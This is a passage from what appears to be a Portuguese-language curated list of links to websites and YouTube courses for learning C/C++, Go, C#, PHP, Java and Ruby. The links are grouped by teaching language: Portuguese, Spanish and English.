C++](https://www.youtube.com/playlist?list=PLWKjhJtqVAbmUE5IqyfGYEYjrZBYzaT4m) - [C Programming Tutorials](https://www.youtube.com/playlist?list=PL_c9BZzLwBRKKqOc9TJz1pP0ASrxLMtp2) - [C Language Tutorial Videos - Mr. Srinivas](https://www.youtube.com/playlist?list=PLVlQHNRLflP8IGz6OXwlV_lgHgc72aXlh) - [Advanced C Programming](https://www.youtube.com/playlist?list=PL7CZ_Xc0qgmJFqNWEt4LIhAPTlT0sCW4C) - [Free Online Programming Course in C for Beginners](https://www.youtube.com/playlist?list=PL76809ED684A081F3) - [C Programming - Ankpro](https://www.youtube.com/playlist?list=PLUtTaqnx2RJLSUZgv0zp0aNWy9e1cbKd9) - [C Programming Tutorials - The New Boston](https://www.youtube.com/playlist?list=PL6gx4Cwl9DGAKIXv8Yr6nhGJ9Vlcjyymq) - [C Programming - IntelliPaat](https://www.youtube.com/playlist?list=PLVHgQku8Z935hrZwx751XoyqDROH_tYMY) - [Learn C programming - edureka!](https://www.youtube.com/playlist?list=PL9ooVrP1hQOFrNo8jK9Yb2g2eMHz7hTu9) - [C Programming Tutorials - Saurabh Shukla](https://www.youtube.com/playlist?list=PLe_7x5eaUqtWp9fvsxhC4XIkoR3n5A-sF) ## 🐬 Sites e cursos para aprender Go > Sites para aprender Go - [Onde aprender e estudar GoLang?](https://coodesh.com/blog/candidates/backend/onde-aprender-e-estudar-golang/#:~:text=%E2%8C%A8%EF%B8%8F%20Udemy,11%2C5%20horas%20de%20videoaula.) - [Go Lang - School Of Net](https://www.schoolofnet.com/cursos/programacao/go-lang/) - [48 horas para aprender Go](https://medium.com/@anapaulagomes/48-horas-para-aprender-go-4542b51d84a4) - [Estudo em GoLang: from Zero to Hero com materiais gratuitos!](https://medium.com/hurb-labs/estudo-em-golang-from-zero-to-hero-com-materiais-gratuitos-6be72aeea30f) > Cursos para aprender Go em Português - [Aprenda Go](https://www.youtube.com/playlist?list=PLCKpcjBB_VlBsxJ9IseNxFllf-UFEXOdg) - [Aprenda Go / Golang (Curso Tutorial de Programação)](https://www.youtube.com/playlist?list=PLUbb2i4BuuzCX8CLeArvx663_0a_hSguW) - [Go Lang do Zero](https://www.youtube.com/playlist?list=PL5aY_NrL1rjucQqO21QH8KclsLDYu1BIg) - [Curso de Introdução a Linguagem Go (Golang)](https://www.youtube.com/playlist?list=PLXFk6ROPeWoAvLMyJ_PPfu8oF0-N_NgEI) - [Curso Programação Golang](https://www.youtube.com/playlist?list=PLpZslZJHL2Q2hZXShelGADqCR_fcOhF9K) > Cursos para aprender Go em Espanhol - [Curso de Go (Golang)](https://www.youtube.com/playlist?list=PLt1J5u9LpM5-L-Ps8jjr91pKhFxAnxKJp) - [Aprendiendo a programar con Go](https://www.youtube.com/playlist?list=PLSAQnrUqbx7sOdjJ5Zsq5FvvYtI8Kc-C5) - [Curso Go - de 0 a 100](https://www.youtube.com/playlist?list=PLhdY0D_lA34W1wS2nJmQr-sssMDuQf-r8) - [Curso Go - CodigoFacilito](https://www.youtube.com/playlist?list=PLdKnuzc4h6gFmPLeous4S0xn0j9Ik2s3Y) - [Curso GO (Golang Español) - De 0 a 100](https://www.youtube.com/playlist?list=PLl_hIu4u7P64MEJpR3eVwQ1l_FtJq4a5g) - [Curso de Golang para principiante](https://www.youtube.com/playlist?list=PLm28buT4PAtbsurufxiw9k2asnkin4YLd) > Cursos para aprender Go em Inglês - [Golang Tutorial for Beginners | Full Go Course](https://www.youtube.com/watch?v=yyUHQIec83I&ab_channel=TechWorldwithNana) - [Learn Go Programming - Golang Tutorial for Beginners](https://www.youtube.com/watch?v=YS4e4q9oBaU&ab_channel=freeCodeCamp.org) - [Backend master class [Golang, Postgres, Docker]](https://www.youtube.com/playlist?list=PLy_6D98if3ULEtXtNSY_2qN21VCKgoQAE) - [Let's go with golang](https://www.youtube.com/playlist?list=PLRAV69dS1uWQGDQoBYMZWKjzuhCaOnBpa) - [Go Programming Language Tutorial | Golang Tutorial For Beginners | Go Language Training](https://www.youtube.com/playlist?list=PLS1QulWo1RIaRoN4vQQCYHWDuubEU8Vij) - [Golang Tutorials](https://www.youtube.com/playlist?list=PLzMcBGfZo4-mtY_SE3HuzQJzuj4VlUG0q) - [Golang course - Duomly](https://www.youtube.com/playlist?list=PLi21Ag9n6jJJ5bq77cLYpCgOaONcQNqm0) - [Golang Course - Evhenii Kozlov](https://www.youtube.com/playlist?list=PLgUAJTkYL6T_-PXWgVFGTkz863zZ_1do0) - [Golang Development](https://www.youtube.com/playlist?list=PLzUGFf4GhXBL4GHXVcMMvzgtO8-WEJIoY) - [Golang Crash Course](https://www.youtube.com/playlist?list=PL3eAkoh7fypqUQUQPn-bXtfiYT_ZSVKmB) - [Golang Course From A to Z - 5 Hours of Video](https://www.youtube.com/playlist?list=PLuMFwYAgU7ii-z4TGGqXh1cJt-Dqnk2eY) ## 🦚 Sites e cursos para aprender C# > Cursos para aprender C# em Português - [Curso de C# - Aprenda o essencial em 5 HORAS](https://www.youtube.com/watch?v=PKMm-cHe56g&ab_channel=VictorLima-GuiadoProgramador) - [Curso de Programação C#](https://www.youtube.com/playlist?list=PLx4x_zx8csUglgKTmgfVFEhWWBQCasNGi) - [Curso C# 2021](https://www.youtube.com/playlist?list=PL50rZONmv8ZTLPRyqb37EoPlBpSmVBJWX) - [Curso de C# para Iniciantes](https://www.youtube.com/playlist?list=PLwftZeDnOzt3VMtat5BTJvP_7qgNtRDD8) - [Linguagem C#](https://www.youtube.com/playlist?list=PLEdPHGYbHhlcxWx-_LrVVYZ2RRdqltums) - [C# - De Novato a Profissional](https://www.youtube.com/playlist?list=PLXik_5Br-zO-rMqpRy5qPG2SLNimKmVCO) - [Curso de C#](https://www.youtube.com/playlist?list=PLesCEcYj003SFffgnOcITHnCJavMf0ArD) - [Curso de C# - Pildoras Informaticas](https://www.youtube.com/playlist?list=PLU8oAlHdN5BmpIQGDSHo5e1r4ZYWQ8m4B) - [Curso de C# Básico e Avançado](https://www.youtube.com/playlist?list=PLxNM4ef1BpxgRAa5mGXlCoSGyfYau8nZI) - [Curso de Programação em C#](https://www.youtube.com/playlist?list=PLO_xIfla8f1wDmI0Vd4YJLKBJhOeQ3xbz) - [Curso de Programação com C#](https://www.youtube.com/playlist?list=PLucm8g_ezqNoMPIGWbRJXemJKyoUpTjA1) - [Curso Básico de C#](https://www.youtube.com/playlist?list=PL0YuSuacUEWsHR_a22z31bvA2heh7iUgr) - [Curso de Desenvolvimento de Sistemas - C# com SQL](https://www.youtube.com/playlist?list=PLxNM4ef1BpxjLIq-eTL8mgROdviCiobs9) - [Curso de C# - Diego Moisset](https://www.youtube.com/playlist?list=PLIygiKpYTC_400MCSyUlje1ifmFltonuN) - [C# - Programação Orientada a Objetos](https://www.youtube.com/playlist?list=PLfvOpw8k80Wreysmw8fonLCBw8kiiYjIU) - [Curso .NET Core C#](https://www.youtube.com/playlist?list=PLs3yd28pfby7WLEdA7GXey47cKZKMrcwS) - [Curso de C# com Entity - CSharp com SQL](https://www.youtube.com/playlist?list=PLxNM4ef1BpxgIUUueLguueyhx0UuICC3-) - [Curso de C# com MVC e SQL](https://www.youtube.com/playlist?list=PLxNM4ef1Bpxgilp2iFXI4i2if6Qtg6qFZ) > Cursos para aprender C# em Espanhol - [Curso C# de 0 a Experto](https://www.youtube.com/playlist?list=PLvMLybJwXhLEVUlBI2VdmYXPARO2Zwxze) - [Tutorial C# - Curso básico](https://www.youtube.com/playlist?list=PLM-p96nOrGcakia6TWllPW9lkQmB2g-yX) - [Aprende a programar en C# desde CERO](https://www.youtube.com/playlist?list=PL8gxzfBmzgexdFa0XZZSZZn2Ogx3j-Qd5) > Cursos para aprender C# em Inglês - [C# Tutorial - Full Course for Beginners](https://www.youtube.com/watch?v=GhQdlIFylQ8&ab_channel=freeCodeCamp.org) - [C# Full Course - Learn C# 10 and .NET 6 in 7 hours](https://www.youtube.com/watch?v=q_F4PyW8GTg&ab_channel=tutorialsEU) - [C# Tutorial: Full Course for Beginners](https://www.youtube.com/watch?v=wxznTygnRfQ&ab_channel=BroCode) - [C# Fundamentals for Beginners](https://www.youtube.com/watch?v=0QUgvfuKvWU&ab_channel=MicrosoftDeveloper) - [C# Tutorial For Beginners - Learn C# Basics in 1 Hour](https://www.youtube.com/watch?v=gfkTfcpWqAY&ab_channel=ProgrammingwithMosh) - [C# for Beginners | Full 2-hour course](https://www.youtube.com/watch?v=Z5JS36NlJiU&ab_channel=dotnet) - [C# Programming All-in-One Tutorial Series (6 HOURS!)](https://www.youtube.com/watch?v=qOruiBrXlAw&ab_channel=CalebCurry) - [Create a C# Application from Start to Finish - Complete Course](https://www.youtube.com/watch?v=wfWxdh-_k_4&ab_channel=freeCodeCamp.org) - [C# Tutorials](https://www.youtube.com/playlist?list=PL_c9BZzLwBRIXCJGLd4UzqH34uCclOFwC) - [C# Mastery Course](https://www.youtube.com/playlist?list=PLrW43fNmjaQVSmaezCeU-Hm4sMs2uKzYN) - [C# Full Course Beginner to Advanced](https://www.youtube.com/playlist?list=PLq5Uz3LSFff8GmtFeoXRZCtWBKQ0kWl-H) - [C# Tutorial For Beginners & Basics - Full Course 2022](https://www.youtube.com/playlist?list=PL82C6-O4XrHfoN_Y4MwGvJz5BntiL0z0D) - [C# for Beginners Course](https://www.youtube.com/playlist?list=PL4LFuHwItvKbneXxSutjeyz6i1w32K6di) - [C# tutorial for beginners](https://www.youtube.com/playlist?list=PLAC325451207E3105) - [C# Online Training](https://www.youtube.com/playlist?list=PLWPirh4EWFpFYePpf3E3AI8LT4NInNoIM) - [C# Training](https://www.youtube.com/playlist?list=PLEiEAq2VkUULDJ9tZd3lc0rcH4W5SNSoW) - [C# for Beginners](https://www.youtube.com/playlist?list=PLdo4fOcmZ0oVxKLQCHpiUWun7vlJJvUiN) - [C# - Programming Language | Tutorial](https://www.youtube.com/playlist?list=PLLAZ4kZ9dFpNIBTYHNDrhfE9C-imUXCmk) - [C#.NET Tutorials](https://www.youtube.com/playlist?list=PLTjRvDozrdlz3_FPXwb6lX_HoGXa09Yef) ## 🐸 Sites e cursos para aprender C++ > Cursos para aprender C++ em Português - [Curso C++ - eXcript](https://www.youtube.com/playlist?list=PLesCEcYj003QTw6OhCOFb1Fdl8Uiqyrqo) - [Curso de C e C++ - Daves Tecnologia](https://www.youtube.com/playlist?list=PL5EmR7zuTn_bONyjFxSO4ZCE-SVVNFGkS) - [Curso Programação em C/C++](https://www.youtube.com/playlist?list=PLC9E87254BD7A875B) - [Curso C++ para iniciantes](https://www.youtube.com/playlist?list=PL8eBmR3QtPL13Dkn5eEfmG9TmzPpTp0cV) - [Curso de C++ e C#](https://www.youtube.com/playlist?list=PLxNM4ef1Bpxhro_xZd-PCUDUsgg8tZFKh) - [Curso C++](https://www.youtube.com/playlist?list=PL6xP0t6HQYWcUPcXLu2XTZ3gOCJSmolgO) - [Curso de C++ - A linguagem de programação fundamental para quem quer ser um programador](https://www.youtube.com/playlist?list=PLx4x_zx8csUjczg1qPHavU1vw1IkBcm40) > Cursos para aprender C++ em Espanhol - [Programación en C++](https://www.youtube.com/playlist?list=PLWtYZ2ejMVJlUu1rEHLC0i_oibctkl0Vh) - [Curso en C++ para principiantes](https://www.youtube.com/playlist?list=PLDfQIFbmwhreSt6Rl2PbDpGuAEqOIPmEu) - [C++ desde cero](https://www.youtube.com/playlist?list=PLAzlSdU-KYwWsM0FgOs4Jqwnr5zhHs0wU) - [Curso de Interfaces Graficas en C/C++](https://www.youtube.com/playlist?list=PLYA44wBp7zVTiCJiXIC5H5OkMOXptxLOI) > Cursos para aprender C++ em Inglês - [C++ Programming Course - Beginner to Advanced 31 hours](https://www.youtube.com/watch?v=8jLOx1hD3_o&ab_channel=freeCodeCamp.org) - [C++ Full Course For Beginners (Learn C++ in 10 hours)](https://www.youtube.com/watch?v=GQp1zzTwrIg&ab_channel=CodeBeauty) - [C++ Tutorial for Beginners - Learn C++ in 1 Hour](https://www.youtube.com/watch?v=ZzaPdXTrSb8&ab_channel=ProgrammingwithMosh) - [C++ Tutorial: Full Course for Beginners](https://www.youtube.com/watch?v=-TkoO8Z07hI&ab_channel=BroCode) - [C++ Tutorial for Beginners - Complete Course](https://www.youtube.com/watch?v=vLnPwxZdW4Y&ab_channel=freeCodeCamp.org) - [C++ Programming All-in-One Tutorial Series (10 HOURS!)](https://www.youtube.com/watch?v=_bYFu9mBnr4&ab_channel=CalebCurry) - [C++ Full Course 2022](https://www.youtube.com/watch?v=SYd5F4gIH90&ab_channel=Simplilearn) - [C++ Crash Course](https://www.youtube.com/watch?v=uhFpPlMsLzY&ab_channel=BroCode) - [C++ - The Cherno](https://www.youtube.com/playlist?list=PLlrATfBNZ98dudnM48yfGUldqGD0S4FFb) - [C++ Full Course | C++ Tutorial | Data Structures & Algorithms](https://www.youtube.com/playlist?list=PLfqMhTWNBTe0b2nM6JHVCnAkhQRGiZMSJ) - [C++ Programming - Neso Academy](https://www.youtube.com/playlist?list=PLBlnK6fEyqRh6isJ01MBnbNpV3ZsktSyS) - [C++ Complete Course](https://www.youtube.com/playlist?list=PLdo5W4Nhv31YU5Wx1dopka58teWP9aCee) - [C++ Tutorials In Hindi](https://www.youtube.com/playlist?list=PLu0W_9lII9agpFUAlPFe_VNSlXW5uE0YL) - [C++ Online Training](https://www.youtube.com/playlist?list=PLWPirh4EWFpGDG3--IKMLPoYrgfuhaz_t) - [C / C++ - freeCodeCamp Playlist](https://www.youtube.com/playlist?list=PLWKjhJtqVAbmUE5IqyfGYEYjrZBYzaT4m) - [C++ Modern Tutorials](https://www.youtube.com/playlist?list=PLgnQpQtFTOGRM59sr3nSL8BmeMZR9GCIA) ## 🐘 Sites e cursos para aprender PHP > Cursos para aprender PHP em Português - [Curso de PHP para Iniciantes](https://www.youtube.com/playlist?list=PLHz_AreHm4dm4beCCCmW4xwpmLf6EHY9k) - [Curso de PHP - Node Studio](https://www.youtube.com/playlist?list=PLwXQLZ3FdTVEITn849NlfI9BGY-hk1wkq) - [Curso de PHP - CFBCursos](https://www.youtube.com/playlist?list=PLx4x_zx8csUgB4R1dDXke4uKMq-IrSr4B) - [Curso de PHP 8 Completo](https://www.youtube.com/playlist?list=PLXik_5Br-zO9wODVI0j58VuZXkITMf7gZ) - [Curso de PHP - eXcript](https://www.youtube.com/playlist?list=PLesCEcYj003TrV2MvUOnmVtMdgIp0C4Pd) - [Curso de PHP Orientado a Objetos](https://www.youtube.com/playlist?list=PLwXQLZ3FdTVEau55kNj_zLgpXL4JZUg8I) - [Curso de PHP8 Completo - Intermédio e Avançado](https://www.youtube.com/playlist?list=PLXik_5Br-zO9Z8l3CE8zaIBkVWjHOboeL) - [Curso de PHP](https://www.youtube.com/playlist?list=PLBFB56E8115533B6C) - [Curso de POO PHP (Programação Orientada a Objetos)](https://www.youtube.com/playlist?list=PLHz_AreHm4dmGuLII3tsvryMMD7VgcT7x) - [Curso de PHP 7 Orientado a Objetos](https://www.youtube.com/playlist?list=PLnex8IkmReXz6t1rqxB-W17dbvfSL1vfg) - [Curso de PHP 7](https://www.youtube.com/playlist?list=PLnex8IkmReXw-QlzKS9zA3rXQsRnK5nnA) - [Curso de PHP com MySQL](https://www.youtube.com/playlist?list=PLucm8g_ezqNrkPSrXiYgGXXkK4x245cvV) - [Curso de PHP para iniciantes](https://www.youtube.com/playlist?list=PLInBAd9OZCzx82Bov1cuo_sZI2Lrb7mXr) - [Curso de PHP 7 e MVC - Micro Framework](https://www.youtube.com/playlist?list=PL0N5TAOhX5E-NZ0RRHa2tet6NCf9-7B5G) - [Curso de PHP - Emerson Carvalho](https://www.youtube.com/playlist?list=PLIZ0d6lKIbVpOxc0x1c4HpEWyK0JMsL49) > Cursos para aprender PHP em Espanhol - [Curso de PHP/MySQL](https://www.youtube.com/playlist?list=PLU8oAlHdN5BkinrODGXToK9oPAlnJxmW_) - [Curso completo de PHP desde cero a experto](https://www.youtube.com/playlist?list=PLH_tVOsiVGzmnl7ImSmhIw5qb9Sy5KJRE) - [Curso PHP 8 y MySQL 8 desde cero](https://www.youtube.com/playlist?list=PLZ2ovOgdI-kUSqWuyoGJMZL6xldXw6hIg) - [Curso de PHP completo desde cero](https://www.youtube.com/playlist?list=PLg9145ptuAij8vIQLU25f7sUSH4E8pdY5) - [Curso completo PHP y MySQL principiantes-avanzado](https://www.youtube.com/playlist?list=PLvRPaExkZHFkpBXXCsL2cn9ORTTcPq4d7) - [Curso PHP Básico](https://www.youtube.com/playlist?list=PL469D93BF3AE1F84F) - [PHP desde cero](https://www.youtube.com/playlist?list=PLAzlSdU-KYwW9eWj88DW55gTi1M5HQo5S) > Cursos para aprender PHP em Inglês - [Learn PHP The Right Way - Full PHP Tutorial For Beginners & Advanced](https://www.youtube.com/playlist?list=PLr3d3QYzkw2xabQRUpcZ_IBk9W50M9pe-) - [PHP Programming Language Tutorial - Full Course](https://www.youtube.com/watch?v=OK_JCtrrv-c&ab_channel=freeCodeCamp.org) - [PHP For Absolute Beginners | 6.5 Hour Course](https://www.youtube.com/watch?v=2eebptXfEvw&ab_channel=TraversyMedia) - [PHP For Beginners | 3+ Hour Crash Course](https://www.youtube.com/watch?v=BUCiSSyIGGU&ab_channel=TraversyMedia) - [PHP Tutorial for Beginners - Full Course | OVER 7 HOURS!](https://www.youtube.com/watch?v=t0syDUSbdfE&ab_channel=EnvatoTuts%2B) - [PHP And MySQL Full Course in 2022](https://www.youtube.com/watch?v=s-iza7kAXME&ab_channel=Simplilearn) - [PHP Full Course | PHP Tutorial For Beginners](https://www.youtube.com/watch?v=6EukZDFE_Zg&ab_channel=Simplilearn) - [PHP Front To Back](https://www.youtube.com/playlist?list=PLillGF-Rfqbap2IB6ZS4BBBcYPagAjpjn) - [PHP Tutorial for Beginners](https://www.youtube.com/playlist?list=PL4cUxeGkcC9gksOX3Kd9KPo-O68ncT05o) - [PHP for beginners](https://www.youtube.com/playlist?list=PLFHz2csJcgk_fFEWydZJLiXpc9nB1qfpi) - [The Complete 2021 PHP Full Stack Web Developer](https://www.youtube.com/playlist?list=PLs-hN447lej6LvquSMoWkGlJAJrhwaVNX) - [PHP Training Videos](https://www.youtube.com/playlist?list=PLEiEAq2VkUUIjP-QLfvICa1TvqTLFvn1b) - [PHP complete course with Project](https://www.youtube.com/playlist?list=PLFINWHSIpuivHWnGE8YGw8uFygThFGr3-) - [PHP Course for Beginners](https://www.youtube.com/playlist?list=PLLQuc_7jk__WTMT4U1qhDkhqd2bOAdxSo) - [PHP Tutorials Playlist](https://www.youtube.com/playlist?list=PL442FA2C127377F07) - [PHP Tutorials](https://www.youtube.com/playlist?list=PL0eyrZgxdwhwBToawjm9faF1ixePexft-) - [PHP Tutorial for Beginners](https://www.youtube.com/playlist?list=PLS1QulWo1RIZc4GM_E04HCPEd_xpcaQgg) - [PHP 7 Course - From Zero to Hero](https://www.youtube.com/playlist?list=PLCwJ-zYcMM92IlmUrW7Nn79y4LHGfODGc) - [PHP Tutorials (updated)](https://www.youtube.com/playlist?list=PL0eyrZgxdwhxhsuT_QAqfi-NNVAlV4WIP) - [PHP & MySQL Tutorial Videos](https://www.youtube.com/playlist?list=PL9ooVrP1hQOFB2yjxFbK-Za8HwM5v1NC5) - [PHP from intermediate to advanced](https://www.youtube.com/playlist?list=PLBEpR3pmwCazOsFp0xI3keBq7SoqDnxM7) - [Object Oriented PHP Tutorials](https://www.youtube.com/playlist?list=PL0eyrZgxdwhypQiZnYXM7z7-OTkcMgGPh) - [PHP OOP Basics Full Course](https://www.youtube.com/playlist?list=PLY3j36HMSHNUfTDnDbW6JI06IrkkdWCnk) - [Advanced PHP](https://www.youtube.com/playlist?list=PLu4-mSyb4l4SlKcO51aLtyiuOmlEuojvZ) ## 🦓 Sites e cursos para aprender Java > Cursos para aprender Java em Português - [Maratona Java Virado no Jiraya](https://www.youtube.com/playlist?list=PL62G310vn6nFIsOCC0H-C2infYgwm8SWW) - [Curso de Java para Iniciantes - Grátis, Completo e com Certificado](https://www.youtube.com/playlist?list=PLHz_AreHm4dkI2ZdjTwZA4mPMxWTfNSpR) - [Curso de Java - Tiago Aguiar](https://www.youtube.com/playlist?list=PLJ0AcghBBWSi6nK2CUkw9ngvwWB1gE8mL) - [Curso de Java - CFBCursos](https://www.youtube.com/playlist?list=PLx4x_zx8csUjFC5WWjoNUL7LOOD7LCKRW) - [Maratona Java - O maior curso Java em português](https://www.youtube.com/playlist?list=PL62G310vn6nHrMr1tFLNOYP_c73m6nAzL) - [Curso de Java Básico Gratuito com Certificado](https://www.youtube.com/playlist?list=PLGxZ4Rq3BOBq0KXHsp5J3PxyFaBIXVs3r) - [Curso de Java - eXcript](https://www.youtube.com/playlist?list=PLesCEcYj003Rfzs39Y4Bs_chpkE276-gD) - [Curso de POO Java (Programação Orientada a Objetos)](https://www.youtube.com/playlist?list=PLHz_AreHm4dkqe2aR0tQK74m8SFe-aGsY) - [Curso de Programação em Java](https://www.youtube.com/playlist?list=PLucm8g_ezqNrQmqtO0qmew8sKXEEcaHvc) - [Curso - Fundamentos da Linguagem Java](https://www.youtube.com/playlist?list=PLbEOwbQR9lqxdW98mY-40IZQ5i8ZZyeQx) - [Curso Java Estruturado](https://www.youtube.com/playlist?list=PLGPluF_nhP9p6zWTN88ZJ1q9J_ZK148-f) - [Curso de Java Completo](https://www.youtube.com/playlist?list=PL6vjf6t3oYOrSx2XQKm3yvNxgjtI1A56P) - [Curso Programação Java](https://www.youtube.com/playlist?list=PLtchvIBq_CRTAwq_xmHdITro_5vbyOvVw) - [Curso de Java para Iniciantes](https://www.youtube.com/playlist?list=PLt2CbMyJxu8iQL67Am38O1j5wKLf0AIRZ) > Cursos para aprender Java em Espanhol - [Curso de Java desde 0](https://www.youtube.com/playlist?list=PLU8oAlHdN5BktAXdEVCLUYzvDyqRQJ2lk) - [Curso de programación Java desde cero](https://www.youtube.com/playlist?list=PLyvsggKtwbLX9LrDnl1-K6QtYo7m0yXWB) - [Curso de Java Completo 2021](https://www.youtube.com/playlist?list=PLt1J5u9LpM59sjPZFl3KYUhTrpwPIhKor) - [Java Netbeans Completo](https://www.youtube.com/playlist?list=PLCTD_CpMeEKTT-qEHGqZH3fkBgXH4GOTF) - [Programación en Java](https://www.youtube.com/playlist?list=PLWtYZ2ejMVJkjOuTCzIk61j7XKfpIR74K) - [Curso de Java 11](https://www.youtube.com/playlist?list=PLf5ldD20p3mHRM3O4yUongNYx6UaELABm) - [Curso de Java - Jesús Conde](https://www.youtube.com/playlist?list=PL4D956E5314B9C253) - [Curso de programacion funcional en java](https://www.youtube.com/playlist?list=PLjJ8HhsSfskiDEwgfyF9EznmrSyEukcJa) > Cursos para aprender Java em Inglês - [Java Tutorial for Beginners](https://www.youtube.com/watch?v=eIrMbAQSU34&ab_channel=ProgrammingwithMosh) - [Java Tutorial: Full Course for Beginners](https://www.youtube.com/watch?v=xk4_1vDrzzo&ab_channel=BroCode) - [Java Full Course](https://www.youtube.com/watch?v=Qgl81fPcLc8&ab_channel=Amigoscode) - [Java Programming for Beginners – Full Course](https://www.youtube.com/watch?v=A74TOX803D0&ab_channel=freeCodeCamp.org) - [Intro to Java Programming - Course for Absolute Beginners](https://www.youtube.com/watch?v=GoXwIVyNvX0&ab_channel=freeCodeCamp.org) - [Learn Java 8 - Full Tutorial for Beginners](https://www.youtube.com/watch?v=grEKMHGYyns&ab_channel=freeCodeCamp.org) - [Java Full Course 2022 | Java Tutorial For Beginners | Core Java Full Course](https://www.youtube.com/watch?v=CFD9EFcNZTQ&ab_channel=Simplilearn) - [Java Full Course for Beginners](https://www.youtube.com/watch?v=_3ds4qujpxU&ab_channel=SDET-QAAutomation) - [Java Full Course | Java Tutorial for Beginners](https://www.youtube.com/watch?v=hBh_CC5y8-s&ab_channel=edureka%21) - [Learn JavaScript in 12 Hours | JavaScript Tutorial For Beginners 2022](https://www.youtube.com/watch?v=A1eszacPf-4&ab_channel=Simplilearn) - [Java GUI: Full Course](https://www.youtube.com/watch?v=Kmgo00avvEw&ab_channel=BroCode) - [Java Collections Framework | Full Course](https://www.youtube.com/watch?v=GdAon80-0KA&ab_channel=JavaGuides) - [Java Programming](https://www.youtube.com/playlist?list=PLBlnK6fEyqRjKA_NuK9mHmlk0dZzuP1P5) - [Java Complete Course | Placement Series](https://www.youtube.com/playlist?list=PLfqMhTWNBTe3LtFWcvwpqTkUSlB32kJop) - [Stanford - Java course](https://www.youtube.com/playlist?list=PLA70DBE71B0C3B142) - [Java Tutorials](https://www.youtube.com/playlist?list=PL_c9BZzLwBRKIMP_xNTJxi9lIgQhE51rF) - [Java Full Course - 2022 | Java Tutorial for Beginners](https://www.youtube.com/playlist?list=PL9ooVrP1hQOEe9EN119lMdwcBxcrBI1D3) - [Java (Intermediate) Tutorials](https://www.youtube.com/playlist?list=PL27BCE863B6A864E3) - [Core Java (Full Course)](https://www.youtube.com/playlist?list=PLsjUcU8CQXGFZ7xMUxJBE33FWWykEWm49) - [Working Class Java Programming & Software Architecture Fundamentals Course](https://www.youtube.com/playlist?list=PLEVlop6sMHCoVFZ8nc_HmXOi8Msrah782) - [Java Programming Tutorials for Beginners [Complete Course]](https://www.youtube.com/playlist?list=PLIY8eNdw5tW_uaJgi-FL9QwINS9JxKKg2) - [Java Tutorials For Beginners In Hindi](https://www.youtube.com/playlist?list=PLu0W_9lII9agS67Uits0UnJyrYiXhDS6q) - [Java Tutorial For Beginners](https://www.youtube.com/playlist?list=PLsyeobzWxl7oZ-fxDYkOToURHhMuWD1BK) - [Java Tutorial for Beginners - Bro Code](https://www.youtube.com/playlist?list=PLZPZq0r_RZOMhCAyywfnYLlrjiVOkdAI1) - [Java Programming Tutorial](https://www.youtube.com/playlist?list=PLsyeobzWxl7pFZoGT1NbZJpywedeyzyaf) - [Java (Beginner) Programming Tutorials](https://www.youtube.com/playlist?list=PLFE2CE09D83EE3E28) - [Complete Java Course for Beginners](https://www.youtube.com/playlist?list=PLab_if3UBk9-ktSKtoVQoLngTFpj9PIed) - [Java Tutorial For Beginners (Step by Step tutorial)](https://www.youtube.com/playlist?list=PLS1QulWo1RIbfTjQvTdj8Y6yyq4R7g-Al) - [Mastering Java Course - Learn Java from ZERO to HERO](https://www.youtube.com/playlist?list=PL6Q9UqV2Sf1gb0izuItEDnU8_YBR-DZi6) - [Tim Buchalka's Java Course PlayList](https://www.youtube.com/playlist?list=PLXtTjtWmQhg1SsviTmKkWO5n0a_-T0bnD) - [Java Full Course](https://www.youtube.com/playlist?list=PLrhDANsBnxU9WFTBt73Qog9CH1ox5zI--) - [Java Course](https://www.youtube.com/playlist?list=PLJSrGkRNEDAhE_nsOkDiC5OvckE7K0bo2) - [Java Web App Course](https://www.youtube.com/playlist?list=PLcRrh9hGNaln4tPtqsmglKenc3NZW7l9M) ## 🐦 Sites e cursos para aprender Ruby > Cursos para aprender Ruby em Português - [Ruby Para Iniciantes (2021 - Curso Completo Para Iniciantes)](https://www.youtube.com/playlist?list=PLnV7i1DUV_zOit4a_tEDf1_PcRd25dL7e) - [Curso completo de Ruby](https://www.youtube.com/playlist?list=PLdDT8if5attEOcQGPHLNIfnSFiJHhGDOZ) - [Curso de Ruby on Rails para Iniciantes](https://www.youtube.com/playlist?list=PLe3LRfCs4go-mkvHRMSXEOG-HDbzesyaP) - [Curso de Ruby on Rails básico](https://www.youtube.com/playlist?list=PLFeyfVYazTkJN6uM5opCfSN_xjxrMybXV) - [Programação com Ruby](https://www.youtube.com/playlist?list=PLucm8g_ezqNqMm1gdqjZzfhAMFQ9KrhFq) - [Linguagem Ruby](https://www.youtube.com/playlist?list=PLEdPHGYbHhldWUFs2Q-jSzXAv3NXh4wu0) > Cursos para aprender Ruby em Espanhol - [Curso Gratuito de Ruby en español](https://www.youtube.com/playlist?list=PL954bYq0HsCUG5_LbfZ54YltPinPSPOks) - [Ruby desde Cero](https://www.youtube.com/playlist?list=PLAzlSdU-KYwUG_5HcRVT4mr0vgLYBeFnm) - [Curso de Ruby](https://www.youtube.com/playlist?list=PLEFC2D43C36013A70) - [Curso Ruby - Codigofacilito](https://www.youtube.com/playlist?list=PLUXwpfHj_sMlkvu4T2vvAnqPSzWQsPesm) - [Curso Ruby on Rails 7 para principiantes en español](https://www.youtube.com/playlist?list=PLP06kydD_xaUS6plnsdonHa5ySbPx1PrP) - [Curso de Ruby on Rails 5](https://www.youtube.com/playlist?list=PLIddmSRJEJ0uaT5imV49pJqP8CGSqN-7E) > Cursos para aprender Ruby em Inglês - [Learn Ruby on Rails - Full Course](https://www.youtube.com/watch?v=fmyvWz5TUWg&ab_channel=freeCodeCamp.org) - [Ruby On Rails Crash Course](https://www.youtube.com/watch?v=B3Fbujmgo60&ab_channel=TraversyMedia) - [Ruby Programming Language - Full Course](https://www.youtube.com/watch?v=t_ispmWmdjY&ab_channel=freeCodeCamp.org) - [Ruby on Rails Tutorial for Beginners - Full Course](https://www.youtube.com/watch?v=-AdqKjqHQIA&ab_channel=CodeGeek) - [Learn Ruby on Rails from Scratch](https://www.youtube.com/watch?v=2zZCzcupQao&ab_channel=ProgrammingKnowledge) - [The complete ruby on rails developer course](https://www.youtube.com/watch?v=y4pKYYMdAA0&ab_channel=FullCourse) - [Ruby on Rails for Beginners](https://www.youtube.com/playlist?list=PLm8ctt9NhMNV75T9WYIrA6m9I_uw7vS56) - [Ruby on Rails Full Course](https://www.youtube.com/playlist?list=PLsikuZM13-0zOytkeVGSKk4VTTgE8x1ns) - [Full Stack Ruby on Rails Development Bootcamp](https://www.youtube.com/playlist?list=PL6SEI86zExmsdxwsyEQcFpF9DWmvttPPu) - [Let's Build: With Ruby On Rails](https://www.youtube.com/playlist?list=PL01nNIgQ4uxNkDZNMON-TrzDVNIk3cOz4) - 